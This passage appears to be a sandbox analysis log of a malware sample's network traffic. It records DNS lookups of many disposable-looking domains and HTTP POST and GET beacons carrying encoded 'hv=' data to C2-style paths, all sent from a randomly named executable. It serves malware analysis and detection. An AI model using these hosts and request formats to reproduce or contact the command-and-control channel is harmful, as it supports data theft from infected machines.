                                                    Jul 1, 2024 15:46:49.943403959 CEST4974780192.168.2.876.223.105.230
                                                    Jul 1, 2024 15:46:49.948236942 CEST804974776.223.105.230192.168.2.8
                                                    Jul 1, 2024 15:46:49.948463917 CEST4974780192.168.2.876.223.105.230
                                                    Jul 1, 2024 15:46:49.951397896 CEST4974780192.168.2.876.223.105.230
                                                    Jul 1, 2024 15:46:49.956239939 CEST804974776.223.105.230192.168.2.8
                                                    Jul 1, 2024 15:46:50.428261995 CEST804974776.223.105.230192.168.2.8
                                                    Jul 1, 2024 15:46:50.428694010 CEST804974776.223.105.230192.168.2.8
                                                    Jul 1, 2024 15:46:50.428710938 CEST804974776.223.105.230192.168.2.8
                                                    Jul 1, 2024 15:46:50.428765059 CEST4974780192.168.2.876.223.105.230
                                                    Jul 1, 2024 15:46:50.428765059 CEST4974780192.168.2.876.223.105.230
                                                    Jul 1, 2024 15:46:51.462567091 CEST4974780192.168.2.876.223.105.230
                                                    Jul 1, 2024 15:46:52.480623007 CEST4974880192.168.2.876.223.105.230
                                                    Jul 1, 2024 15:46:52.485611916 CEST804974876.223.105.230192.168.2.8
                                                    Jul 1, 2024 15:46:52.485696077 CEST4974880192.168.2.876.223.105.230
                                                    Jul 1, 2024 15:46:52.487907887 CEST4974880192.168.2.876.223.105.230
                                                    Jul 1, 2024 15:46:52.492748022 CEST804974876.223.105.230192.168.2.8
                                                    Jul 1, 2024 15:46:52.961931944 CEST804974876.223.105.230192.168.2.8
                                                    Jul 1, 2024 15:46:52.961945057 CEST804974876.223.105.230192.168.2.8
                                                    Jul 1, 2024 15:46:52.962008953 CEST4974880192.168.2.876.223.105.230
                                                    Jul 1, 2024 15:46:52.963485956 CEST804974876.223.105.230192.168.2.8
                                                    Jul 1, 2024 15:46:52.963541985 CEST4974880192.168.2.876.223.105.230
                                                    Jul 1, 2024 15:46:53.991512060 CEST4974880192.168.2.876.223.105.230
                                                    Jul 1, 2024 15:46:55.010360956 CEST4974980192.168.2.876.223.105.230
                                                    Jul 1, 2024 15:46:55.015340090 CEST804974976.223.105.230192.168.2.8
                                                    Jul 1, 2024 15:46:55.015430927 CEST4974980192.168.2.876.223.105.230
                                                    Jul 1, 2024 15:46:55.017518044 CEST4974980192.168.2.876.223.105.230
                                                    Jul 1, 2024 15:46:55.022440910 CEST804974976.223.105.230192.168.2.8
                                                    Jul 1, 2024 15:46:55.022492886 CEST804974976.223.105.230192.168.2.8
                                                    Jul 1, 2024 15:46:56.093729973 CEST804974976.223.105.230192.168.2.8
                                                    Jul 1, 2024 15:46:56.093740940 CEST804974976.223.105.230192.168.2.8
                                                    Jul 1, 2024 15:46:56.093749046 CEST804974976.223.105.230192.168.2.8
                                                    Jul 1, 2024 15:46:56.093759060 CEST804974976.223.105.230192.168.2.8
                                                    Jul 1, 2024 15:46:56.093828917 CEST4974980192.168.2.876.223.105.230
                                                    Jul 1, 2024 15:46:56.093946934 CEST4974980192.168.2.876.223.105.230
                                                    Jul 1, 2024 15:46:56.094387054 CEST804974976.223.105.230192.168.2.8
                                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                    Jul 1, 2024 15:44:45.799751043 CEST | 192.168.2.8 | 1.1.1.1 | 0x4ae2 | Standard query (0) | www.evoolihubs.shop | A (IP address) | IN (0x0001) | false
                                                    Jul 1, 2024 15:45:01.369715929 CEST | 192.168.2.8 | 1.1.1.1 | 0x941d | Standard query (0) | www.mycaringfriend.online | A (IP address) | IN (0x0001) | false
                                                    Jul 1, 2024 15:45:15.244791985 CEST | 192.168.2.8 | 1.1.1.1 | 0x6462 | Standard query (0) | www.marttyes.top | A (IP address) | IN (0x0001) | false
                                                    Jul 1, 2024 15:45:28.791532040 CEST | 192.168.2.8 | 1.1.1.1 | 0xfc01 | Standard query (0) | www.sponsoraveteran.info | A (IP address) | IN (0x0001) | false
                                                    Jul 1, 2024 15:45:41.917356968 CEST | 192.168.2.8 | 1.1.1.1 | 0xd2e2 | Standard query (0) | www.yvw66.top | A (IP address) | IN (0x0001) | false
                                                    Jul 1, 2024 15:45:55.854392052 CEST | 192.168.2.8 | 1.1.1.1 | 0x380a | Standard query (0) | www.fundraiserstuffies.com | A (IP address) | IN (0x0001) | false
                                                    Jul 1, 2024 15:46:08.987983942 CEST | 192.168.2.8 | 1.1.1.1 | 0x6b61 | Standard query (0) | www.aquamotricidad.com | A (IP address) | IN (0x0001) | false
                                                    Jul 1, 2024 15:46:22.526958942 CEST | 192.168.2.8 | 1.1.1.1 | 0x167 | Standard query (0) | www.te74y.top | A (IP address) | IN (0x0001) | false
                                                    Jul 1, 2024 15:46:36.120467901 CEST | 192.168.2.8 | 1.1.1.1 | 0x3507 | Standard query (0) | www.ngkwnq.xyz | A (IP address) | IN (0x0001) | false
                                                    Jul 1, 2024 15:46:49.786616087 CEST | 192.168.2.8 | 1.1.1.1 | 0x86e7 | Standard query (0) | www.eoghenluire.com | A (IP address) | IN (0x0001) | false
                                                    Jul 1, 2024 15:47:03.041403055 CEST | 192.168.2.8 | 1.1.1.1 | 0xc8b7 | Standard query (0) | www.poodlemum.com | A (IP address) | IN (0x0001) | false
                                                    Jul 1, 2024 15:47:17.057301044 CEST | 192.168.2.8 | 1.1.1.1 | 0xc480 | Standard query (0) | www.ajjmamlllqqq.xyz | A (IP address) | IN (0x0001) | false
                                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                    Jul 1, 2024 15:44:45.815962076 CEST | 1.1.1.1 | 192.168.2.8 | 0x4ae2 | No error (0) | www.evoolihubs.shop | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                                    Jul 1, 2024 15:44:45.815962076 CEST | 1.1.1.1 | 192.168.2.8 | 0x4ae2 | No error (0) | www.evoolihubs.shop | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                                                    Jul 1, 2024 15:45:01.544222116 CEST | 1.1.1.1 | 192.168.2.8 | 0x941d | No error (0) | www.mycaringfriend.online | | 3.33.244.179 | A (IP address) | IN (0x0001) | false
                                                    Jul 1, 2024 15:45:15.560376883 CEST | 1.1.1.1 | 192.168.2.8 | 0x6462 | No error (0) | www.marttyes.top | | 203.161.41.207 | A (IP address) | IN (0x0001) | false
                                                    Jul 1, 2024 15:45:28.815490007 CEST | 1.1.1.1 | 192.168.2.8 | 0xfc01 | No error (0) | www.sponsoraveteran.info | sponsoraveteran.info | | CNAME (Canonical name) | IN (0x0001) | false
                                                    Jul 1, 2024 15:45:28.815490007 CEST | 1.1.1.1 | 192.168.2.8 | 0xfc01 | No error (0) | sponsoraveteran.info | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
                                                    Jul 1, 2024 15:45:28.815490007 CEST | 1.1.1.1 | 192.168.2.8 | 0xfc01 | No error (0) | sponsoraveteran.info | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
                                                    Jul 1, 2024 15:45:42.284054041 CEST | 1.1.1.1 | 192.168.2.8 | 0xd2e2 | No error (0) | www.yvw66.top | yvw66.top | | CNAME (Canonical name) | IN (0x0001) | false
                                                    Jul 1, 2024 15:45:42.284054041 CEST | 1.1.1.1 | 192.168.2.8 | 0xd2e2 | No error (0) | yvw66.top | | 38.47.232.185 | A (IP address) | IN (0x0001) | false
                                                    Jul 1, 2024 15:45:55.893541098 CEST | 1.1.1.1 | 192.168.2.8 | 0x380a | No error (0) | www.fundraiserstuffies.com | fundraiserstuffies.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                    Jul 1, 2024 15:45:55.893541098 CEST | 1.1.1.1 | 192.168.2.8 | 0x380a | No error (0) | fundraiserstuffies.com | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
                                                    Jul 1, 2024 15:45:55.893541098 CEST | 1.1.1.1 | 192.168.2.8 | 0x380a | No error (0) | fundraiserstuffies.com | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
                                                    Jul 1, 2024 15:46:09.051515102 CEST | 1.1.1.1 | 192.168.2.8 | 0x6b61 | No error (0) | www.aquamotricidad.com | aquamotricidad.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                    Jul 1, 2024 15:46:09.051515102 CEST | 1.1.1.1 | 192.168.2.8 | 0x6b61 | No error (0) | aquamotricidad.com | | 81.88.48.71 | A (IP address) | IN (0x0001) | false
                                                    Jul 1, 2024 15:46:22.558290005 CEST | 1.1.1.1 | 192.168.2.8 | 0x167 | No error (0) | www.te74y.top | te74y.top | | CNAME (Canonical name) | IN (0x0001) | false
                                                    Jul 1, 2024 15:46:22.558290005 CEST | 1.1.1.1 | 192.168.2.8 | 0x167 | No error (0) | te74y.top | | 38.47.207.94 | A (IP address) | IN (0x0001) | false
                                                    Jul 1, 2024 15:46:36.492676020 CEST | 1.1.1.1 | 192.168.2.8 | 0x3507 | No error (0) | www.ngkwnq.xyz | | 35.241.41.54 | A (IP address) | IN (0x0001) | false
                                                    Jul 1, 2024 15:46:49.939966917 CEST | 1.1.1.1 | 192.168.2.8 | 0x86e7 | No error (0) | www.eoghenluire.com | eoghenluire.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                    Jul 1, 2024 15:46:49.939966917 CEST | 1.1.1.1 | 192.168.2.8 | 0x86e7 | No error (0) | eoghenluire.com | | 76.223.105.230 | A (IP address) | IN (0x0001) | false
                                                    Jul 1, 2024 15:46:49.939966917 CEST | 1.1.1.1 | 192.168.2.8 | 0x86e7 | No error (0) | eoghenluire.com | | 13.248.243.5 | A (IP address) | IN (0x0001) | false
                                                    Jul 1, 2024 15:47:03.056957960 CEST | 1.1.1.1 | 192.168.2.8 | 0xc8b7 | No error (0) | www.poodlemum.com | poodlemum.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                    Jul 1, 2024 15:47:03.056957960 CEST | 1.1.1.1 | 192.168.2.8 | 0xc8b7 | No error (0) | poodlemum.com | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
                                                    Jul 1, 2024 15:47:03.056957960 CEST | 1.1.1.1 | 192.168.2.8 | 0xc8b7 | No error (0) | poodlemum.com | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
                                                    Jul 1, 2024 15:47:17.373507977 CEST | 1.1.1.1 | 192.168.2.8 | 0xc480 | No error (0) | www.ajjmamlllqqq.xyz | | 35.244.172.47 | A (IP address) | IN (0x0001) | false
                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    0 | 192.168.2.8 | 49712 | 188.114.97.3 | 80 | 5992 | C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 1, 2024 15:44:45.829499006 CEST | 352 | OUT | GET /z6sg/?hv=zih0DoxsYMMKz8ZABxgT1WFK2McCJpyMbPq/OME2Y84w2Vm66kFudiKZ8IXY1l1UIMuRoxNGX/afyyUEkrlqrKni6t8ICyCnTx8av+sD3Gyos8WHaN8U0OpOBqhAw2rkZw==&Sbzdb=DvgXWdN HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Host: www.evoolihubs.shop
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Jul 1, 2024 15:44:46.319389105 CEST | 976 | IN | HTTP/1.1 301 Moved Permanently
                                                    Date: Mon, 01 Jul 2024 13:44:46 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 167
                                                    Connection: close
                                                    Cache-Control: max-age=3600
                                                    Expires: Mon, 01 Jul 2024 14:44:46 GMT
                                                    Location: https://www.evoolihubs.shop/z6sg/?hv=zih0DoxsYMMKz8ZABxgT1WFK2McCJpyMbPq/OME2Y84w2Vm66kFudiKZ8IXY1l1UIMuRoxNGX/afyyUEkrlqrKni6t8ICyCnTx8av+sD3Gyos8WHaN8U0OpOBqhAw2rkZw==&Sbzdb=DvgXWdN
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aJupQeFy5Ch4BVKlgPDN8U%2BN%2BKLomEme4rRKAy2AwebAAep9DMRxsMl76x3Hq%2FX0W20R5NJ4Oq6dDMtBw9G6sJa54DJ%2FH5WR6gBUvngPq4o3ezSXgi2YfHAQh1FDgXjsDsfHxwht"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89c6d529190c4237-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    1 | 192.168.2.8 | 49713 | 3.33.244.179 | 80 | 5992 | C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 1, 2024 15:45:01.553785086 CEST | 635 | OUT | POST /4xhu/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.mycaringfriend.online
                                                    Origin: http://www.mycaringfriend.online
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 203
                                                    Connection: close
                                                    Referer: http://www.mycaringfriend.online/4xhu/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Ascii: hv=pWKASQBHkG5XQBEnI9ujBuVNXSkcgSkb9o1LMhBTy20oUf51Y7eVVf2Y47gzts8HpuEbu/fd99cBSgx7ZemRZMffcJwkW2QaNsa8fq3JF5H8xpKVxCQX7qmDkQfqxTPB70MW/k8sQfcE/QZts2a/9I1T7jyID78gnvP44X5dtnKUWxjRwaxCK7V5Sfse4ZyyiNdbkcE=


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    2 | 192.168.2.8 | 49714 | 3.33.244.179 | 80 | 5992 | C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 1, 2024 15:45:04.094849110 CEST | 655 | OUT | POST /4xhu/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.mycaringfriend.online
                                                    Origin: http://www.mycaringfriend.online
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 223
                                                    Connection: close
                                                    Referer: http://www.mycaringfriend.online/4xhu/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Ascii: hv=pWKASQBHkG5XQhUnNa6jJuVOYykc7ikf9o5LMgEIylAoU791JJmVSf2Ywbg2jM9FpuZmu9Ld99IBSlV7ZpSebcfZXpwqJmQaNsa8fufvF4j8x5aV+A4WlamAnQfqnTPF70Mk/mISQdUE/RpttiGwm41R0DzXSpNUvfzYyxlds2OrTHO7q45EJ79SScEo9uva4uNr6LQPGWnARWpV9qClFS2aln0/


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    3 | 192.168.2.8 | 49715 | 3.33.244.179 | 80 | 5992 | C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 1, 2024 15:45:06.626580000 CEST | 1672 | OUT | POST /4xhu/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.mycaringfriend.online
                                                    Origin: http://www.mycaringfriend.online
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1239
                                                    Connection: close
                                                    Referer: http://www.mycaringfriend.online/4xhu/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    4 | 192.168.2.8 | 49716 | 3.33.244.179 | 80 | 5992 | C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 1, 2024 15:45:09.157557964 CEST | 358 | OUT | GET /4xhu/?hv=kUigRkBAqBt1RQ4PHNukF4xZPToH+1QI6otQDXJCvCY9YbUgfI2Re+iS8c4dlot+geZi3vfTzLYXZH9sWq6jT8j+eYYKaAUwNfi+eLrrbumEku+3ygxonLPUoh3L9hGJlw==&Sbzdb=DvgXWdN HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Host: www.mycaringfriend.online
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Jul 1, 2024 15:45:10.227319956 CEST | 404 | IN | HTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Mon, 01 Jul 2024 13:45:09 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 264
                                                    Connection: close
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?hv=kUigRkBAqBt1RQ4PHNukF4xZPToH+1QI6otQDXJCvCY9YbUgfI2Re+iS8c4dlot+geZi3vfTzLYXZH9sWq6jT8j+eYYKaAUwNfi+eLrrbumEku+3ygxonLPUoh3L9hGJlw==&Sbzdb=DvgXWdN"}</script></head></html>
                                                    Jul 1, 2024 15:45:10.227592945 CEST | 404 | IN | HTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Mon, 01 Jul 2024 13:45:09 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 264
                                                    Connection: close
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?hv=kUigRkBAqBt1RQ4PHNukF4xZPToH+1QI6otQDXJCvCY9YbUgfI2Re+iS8c4dlot+geZi3vfTzLYXZH9sWq6jT8j+eYYKaAUwNfi+eLrrbumEku+3ygxonLPUoh3L9hGJlw==&Sbzdb=DvgXWdN"}</script></head></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    5 | 192.168.2.8 | 49717 | 203.161.41.207 | 80 | 5992 | C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 1, 2024 15:45:15.569847107 CEST | 608 | OUT | POST /o2rg/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.marttyes.top
                                                    Origin: http://www.marttyes.top
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 203
                                                    Connection: close
                                                    Referer: http://www.marttyes.top/o2rg/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Ascii: hv=KqEJoaOcoPota3RheeHQCazgCvpixbtwCNlzLCA9o2+6DlF+WfdH317d4qlclGRCJGWej6xZWW/FJ1hemKZSCTlOiSXdy//5KfmuqIoVHTXy7S4psbZsAJVqVVNFcj0PArx82+6JFGNyhTHQ17aNlhRpY7eKtQYg0DqgBQv6HxLFw2dM+qJxXjE7wKrENxQXTi6ZGx8=
                                                    Jul 1, 2024 15:45:16.198968887 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 01 Jul 2024 13:45:16 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    6 | 192.168.2.8 | 49719 | 203.161.41.207 | 80 | 5992 | C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 1, 2024 15:45:18.110457897 CEST | 628 | OUT | POST /o2rg/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.marttyes.top
                                                    Origin: http://www.marttyes.top
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 223
                                                    Connection: close
                                                    Referer: http://www.marttyes.top/o2rg/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Ascii: hv=KqEJoaOcoPotaXhhf/HQA6zhOPpiqrt0CNpzLD0ToEK6DE1+VaxH017d3KldomQOJGqgj7NZWW7FJ0Rem9FRBjlA7CXf8f/5KfmuqIs/HTPy4iIpu/Ntf5VpClNFYj1nArxa28PkFEFyhXDQ1uuOrhRvHLfYmSUpzkunNRfbBHLA1AwmkIB3UjsQwJDyIGN/JBqpYmoCOGc2tNxohcfitjQ+htxZ
                                                    Jul 1, 2024 15:45:18.702887058 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 01 Jul 2024 13:45:18 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    7 | 192.168.2.8 | 49720 | 203.161.41.207 | 80 | 5992 | C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 1, 2024 15:45:20.643012047 CEST | 1645 | OUT | POST /o2rg/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.marttyes.top
                                                    Origin: http://www.marttyes.top
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1239
                                                    Connection: close
                                                    Referer: http://www.marttyes.top/o2rg/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Jul 1, 2024 15:45:21.264017105 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 01 Jul 2024 13:45:21 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    8 | 192.168.2.8 | 49721 | 203.161.41.207 | 80 | 5992 | C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 1, 2024 15:45:23.177057028 CEST | 349 | OUT | GET /o2rg/?hv=HosprsjiipEFZkdlXtfyIs2HS8VP0Lx1JctxEV0LpDy1TX4kdcFD2HTZ1ZNwt0d2CmaO7pR5URztAlcHvOxdSj57tnDbyp24LsG2z7IhVzqV3j0gtM8YC4wacEpxZhptTA==&Sbzdb=DvgXWdN HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Host: www.marttyes.top
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Jul 1, 2024 15:45:23.783843994 CEST | 548 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 01 Jul 2024 13:45:23 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html; charset=utf-8
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    9 | 192.168.2.8 | 49722 | 3.33.130.190 | 80 | 5992 | C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 1, 2024 15:45:28.829322100 CEST | 632 | OUT | POST /v1kj/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.sponsoraveteran.info
                                                    Origin: http://www.sponsoraveteran.info
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 203
                                                    Connection: close
                                                    Referer: http://www.sponsoraveteran.info/v1kj/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Ascii: hv=QqLe5VR9QBg9r1lOHQ6UzWx7R3i5DAA4F3Hlbs84O82Ps4ljWe+Rrt2aeyzAqzugdDiXeI9VMD5DCtnKul7ezN511Nns7HerixsfUHprfDLcWdvS+UkFsqX6evmH6EcSbfYuEyn+aQRe5MTzVfB2FmnBvRxP8x14I/B/Q7ncjE62yENpNfRohJF7aeB6Js6QlmKnUe0=


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    10 | 192.168.2.8 | 49723 | 3.33.130.190 | 80 | 5992 | C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 1, 2024 15:45:31.367974997 CEST | 652 | OUT | POST /v1kj/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.sponsoraveteran.info
                                                    Origin: http://www.sponsoraveteran.info
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 223
                                                    Connection: close
                                                    Referer: http://www.sponsoraveteran.info/v1kj/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Ascii: hv=QqLe5VR9QBg9rRhOE3WUmmx4Pni5IgA8F3blbtIoNOSPtZVjXf+R+t2aVSzFgTvidDvoeK5VMDdDCv/KtWiI1d53t9nqmXerixsfUH8OfDDcK4nS/1kCy6X5ZvmHs0cebfYYE2vQaWVe5JvzWK11PmnbixxB7D40SIBuWaH68XeS6SgDX9ZuiJtQadpMMbn4/FaXKJjr0FAOkWFqIRA2u2yfuA1I


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    11 | 192.168.2.8 | 49724 | 3.33.130.190 | 80 | 5992 | C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 1, 2024 15:45:33.911138058 CEST | 1669 | OUT | POST /v1kj/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.sponsoraveteran.info
                                                    Origin: http://www.sponsoraveteran.info
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1239
                                                    Connection: close
                                                    Referer: http://www.sponsoraveteran.info/v1kj/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
